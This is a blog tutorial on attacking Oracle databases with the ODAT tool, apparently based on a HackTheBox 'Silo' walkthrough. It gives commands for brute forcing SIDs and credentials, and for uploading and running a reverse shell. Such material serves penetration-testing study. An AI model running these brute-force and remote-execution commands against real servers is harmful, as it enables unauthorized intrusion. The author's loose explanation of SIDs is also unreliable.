Hacking Tutorial, Pentesting

Pentesting Oracle Databases with The Oracle Database Exploitation Tool (ODAT)

When coming across an Oracle database, there is an awesome framework that you can use for pentesting it called The Oracle Database Exploitation Tool (ODAT). This post intends to serve as a guide for leveraging this tool, based on what Ippsec performs during his Silo video.

Table of Contents:

  • Installing ODAT
  • Bruteforcing SIDs
  • Brute Forcing User Accounts
  • Gaining a Reverse Shell

Installing ODAT

The Oracle Database Exploitation Tool (ODAT) is available for download at https://github.com/quentinhardy/odat.

We’ll start by changing into opt and running git.

cd /opt
git clone https://github.com/quentinhardy/odat.git

Then we’ll change into the directory and install additional packages.

cd odat/
sudo apt-get install libaio1 python3-dev alien python3-pip

Get instant client basic, sdk (devel) and sqlplus from the Oracle web site:

X64: http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html
X86: http://www.oracle.com/technetwork/topics/linuxsoft-082809.html

Move the downloaded file into this directory and run the following command.

sudo alien --to-deb *.rpm

This should unpack a few files, and then run.

sudo dpkg -i *.deb

Put these lines in your /etc/profile file in order to define Oracle env variables:

export ORACLE_HOME=/usr/lib/oracle/<version>/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH

Then restart your session!


Bruteforcing SIDs

The SID is something that you have to provide with the rest of our commands in order to leverage this tool. I’m not sure exactly what a SID is, but I like to pretend that it’s a container that contains multiple databases. Because of this, we need to first identify what SIDs are in use before we can enumerate user accounts.

To begin our attack, we can use the following:

./odat.py sidguess -s <targetIP> -p <port>

Note: You can also use the Metasploit module /oracle/sid_brute

Eventually, the valid SIDs should be returned.


Brute Forcing User Accounts

Next, we can leverage the passwordguesser module to guess credentials. By default, ODAT will use a password file that is in all caps, but you may or may not want to alter and/or change the file used. For example, some versions of Oracle may be case sensitive and you won’t want a password file in all caps.

If you want to customize the wordlist, you can modify the file located at the following path:

/opt/odat/accounts/accounts.txt

You could even copy the wordlist that Metasploit uses, which is located at the following path. Just make sure to reformat your wordlist in the correct format:

/usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

Once you’re ready to run the attack, you can with the following command.

./odat.py passwordguesser -s <targetIP> -d <SID>


Gaining a Reverse Shell

A quick snippet of the help documentation can be found below.

To gain a shell, you can upload a reverse shell to the box, as long as you have identified a valid SID and valid user credentials with write privileges:

./odat.py utilfile -s <targetIP> --sysdba -d <SID> -U <username> -P <password> --putFile <remotePath> <remoteFilename> <localFilename>

Ippsec shows doing this within his Silo video like this.

Then you can execute the file using the following command. Make sure you set up a listener to catch your shell.

./odat.py externaltable -s <targetIP> --sysdba -d <SID> -U <username> -P <password> --exec <remotePath> <remoteFilename>


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s